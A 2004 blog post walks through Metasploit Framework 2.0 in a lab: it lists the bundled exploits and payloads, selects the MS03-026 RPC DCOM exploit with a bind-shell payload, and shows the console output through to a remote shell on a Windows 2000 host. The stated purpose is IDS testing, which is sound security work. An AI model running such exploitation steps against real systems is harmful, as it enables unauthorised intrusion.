Monday, April 12, 2004

Metasploit Framework in Action

You may have seen the Slashdot article on the Metasploit Project. From the project's Web site:

"The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. This release includes 18 exploits and 27 payloads; many of these exploits are either the only ones publicly available or just much more reliable than anything else out there. The Framework will run on any modern system that has a working Perl interpreter."

I gave the project a try. First I read the Crash Course user's guide, which told me to install p5-ReadLine-Gnu. I did so using the FreeBSD ports tree:

orr:/usr/ports/devel/p5-ReadLine-Gnu# make install
===> Vulnerability check disabled, database not found
>> Term-ReadLine-Gnu-1.14.tar.gz doesn't seem to exist in /usr/ports/distfiles/.
>> Attempting to fetch from http://www.cpan.dk/CPAN/modules/by-module/Term/.
Receiving Term-ReadLine-Gnu-1.14.tar.gz (65140 bytes): 100%
...truncated...

Once done, I ran the msfconsole and used one of the included exploits to compromise a Windows 2000 system in my lab. First I run msfconsole:

orr:/home/richard/framework-2.0$ perl ./msfconsole
+ -- --=[ msfconsole v2.0 [18 exploits - 27 payloads]

msf > help

Metasploit Framework Main Console Help
======================================

? Show the main console help
cd Change working directory
exit Exit the console
help Show the main console help
info Display detailed exploit or payload information
quit Exit the console
reload Reload exploits and payloads
save Save configuration to disk
setg Set a global environment variable
show Show available exploits and payloads
unsetg Remove a global environment variable
use Select an exploit by name
version Show console version

Next I check out the loaded exploits and select one for MS03-026:

msf > show exploits

Metasploit Framework Loaded Exploits
====================================

apache_chunked_win32 Apache Win32 Chunked Encoding
blackice_pam_icq Blackice/RealSecure/Other ISS ICQ Parser Buffer Overflow
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
imail_ldap IMail LDAP Service Buffer Overflow
msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
mssql2000_resolution MSSQL 2000 Resolution Overflow
poptop_negative_read PoPToP Negative Read Overflow
realserver_describe_linux RealServer Describe Buffer Overflow
samba_trans2open Samba trans2open Overflow
sambar6_search_results Sambar 6 Search Results Buffer Overflow
servu_mdtm_overflow Serv-U FTPD MDTM Overflow
solaris_sadmind_exec Solaris sadmind Command Execution
warftpd_165_pass War-FTPD 1.65 PASS Overflow

msf > use msrpc_dcom_ms03_026

Once I have an exploit selected, I need to set the options it needs:

msf msrpc_dcom_ms03_026 > show options

Exploit Options
===============

Exploit: Name Default Description
-------- ------ ------- ------------------
required RPORT 135 The target port
required RHOST The target address

msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.3
RHOST -> 10.10.10.3

msf msrpc_dcom_ms03_026 > show targets

Supported Exploit Targets
=========================

0 Windows NT SP6/2K/XP ALL

With an exploit selected, I also need to choose a payload. This tells the Metasploit framework how I wish to interact with the target. I choose a simple binding connection.

msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads
====================================

winadduser Create a new user and add to local Administrators group
winbind Listen for connection and spawn a shell
winbind_stg Listen for connection and spawn a shell
winbind_stg_upexec Listen for connection then upload and exec file
winexec Execute an arbitrary command
winreverse Connect back to attacker and spawn a shell
winreverse_stg Connect back to attacker and spawn a shell
winreverse_stg_ie Listen for connection, send address of GP/LL across,
read/exec InlineEgg
winreverse_stg_upexec Connect back to attacker and spawn a shell

msf msrpc_dcom_ms03_026 > info payload winbind

Name: winbind
Version: $Revision: 1.15 $
OS/CPU: win32/x86
Needs Admin: No
Multistage: No
Total Size: 374

Provided By:
H D Moore [Artistic License]

Available Options:
optional: EXITFUNC Exit technique: "process", "thread", "seh"
required: LPORT Listening port for bind shell

Description:
Listen for connection and spawn a shell

msf msrpc_dcom_ms03_026 > set PAYLOAD winbind
PAYLOAD -> winbind

msf msrpc_dcom_ms03_026(winbind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ---------- ------------------
required RPORT 135 The target port
required RHOST 10.10.10.3 The target address

Payload: Name Default Description
-------- -------- ------- ------------------------------------------
optional EXITFUNC seh Exit technique: "process", "thread", "seh"
required LPORT Listening port for bind shell

msf msrpc_dcom_ms03_026(winbind) > set LPORT 9999
LPORT -> 9999

Once I have set the required options, I launch the exploit and get a shell:

msf msrpc_dcom_ms03_026(winbind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x90e5
[*] Got connection from 10.10.10.3:9999

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>netstat -na
...edited...
TCP 10.10.10.3:9999 192.168.50.2:26297 ESTABLISHED
...truncated...

I see this project providing an easy way to launch exploits to test IDS deployments. It's very powerful and flexible. Previously I used raccess to easily launch exploits for IDS testing purposes.